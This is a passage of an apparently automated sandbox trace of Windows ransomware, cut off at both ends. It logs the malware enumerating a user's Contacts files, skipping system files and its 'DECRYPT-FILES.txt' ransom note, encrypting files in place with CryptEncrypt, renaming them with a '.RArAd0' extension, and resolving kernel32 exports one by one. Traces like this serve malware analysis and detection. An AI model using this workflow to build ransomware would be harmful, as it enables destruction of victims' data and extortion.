returned 18 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.783] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.783] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.784] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.784] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 60 [0082.784] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.RArAd0") returned 67 [0082.784] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.RArAd0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.rarad0"), dwFlags=0x0) returned 1 [0082.784] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.785] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.785] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.785] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0082.785] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="DECRYPT-FILES.txt") returned 1 [0082.785] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="autorun.inf") returned 1 [0082.785] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="boot.ini") returned 1 [0082.785] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="desktop.ini") returned 1 [0082.785] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="ntuser.dat") returned 1 [0082.785] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="iconcache.db") returned 1 [0082.785] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="bootsect.bak") returned 1 [0082.785] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="ntuser.dat.log") returned 1 [0082.785] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="thumbs.db") returned -1 [0082.785] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="Bootfont.bin") returned 1 [0082.785] lstrlenW (lpString="sikvnb huvuib.contact") returned 21 [0082.785] lstrcmpiW (lpString1="contact", lpString2="lnk") returned -1 [0082.785] lstrcmpiW (lpString1="contact", lpString2="exe") returned -1 [0082.785] lstrcmpiW (lpString1="contact", lpString2="sys") returned -1 [0082.786] lstrcmpiW (lpString1="contact", lpString2="dll") returned -1 [0082.786] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0082.786] lstrlenW (lpString="sikvnb huvuib.contact") returned 21 [0082.786] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0082.786] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="sikvnb huvuib.contact" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" [0082.786] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.787] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=1172) returned 1 [0082.787] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.787] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.788] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.788] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.788] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.788] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.788] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.789] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.789] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.789] CloseHandle (hObject=0x43c) returned 1 [0082.789] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.789] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.790] CloseHandle (hObject=0x0) returned 0 [0082.790] CloseHandle (hObject=0x438) returned 1 [0082.790] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.790] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.791] GetTickCount () returned 0x114d2ba [0082.791] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.791] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.791] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.791] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.791] lstrlenA (lpString="kernel32.dll") returned 12 [0082.791] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.792] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.792] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.792] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.792] lstrlenA (lpString="ADDATOMA") returned 8 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.792] lstrlenA (lpString="ADDATOMW") returned 8 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.792] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.792] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.792] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.792] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.792] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.792] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.792] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.792] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.792] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.792] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.792] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.792] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.792] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.792] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.793] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.793] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.793] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.793] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.793] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.793] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.793] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.793] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.793] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.793] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.793] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.793] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.793] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.793] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.793] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.793] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.793] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.793] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.794] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.794] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.794] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.794] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.794] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.794] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.794] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.794] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.794] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.794] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.794] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.794] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.794] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.794] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.794] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.794] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.794] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.794] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.795] lstrlenA (lpString="BEEP") returned 4 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.795] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.795] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.795] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.795] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.795] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.795] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.795] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.795] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.795] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.795] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.795] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.795] lstrlenA (lpString="CANCELIO") returned 8 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.795] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.795] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.795] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.795] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.795] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.796] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.796] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.796] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.796] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.796] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.796] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.796] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.796] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.796] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.796] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.796] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.796] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.796] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.796] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.796] lstrcpyA (in: lpString1=0x3f2d468, 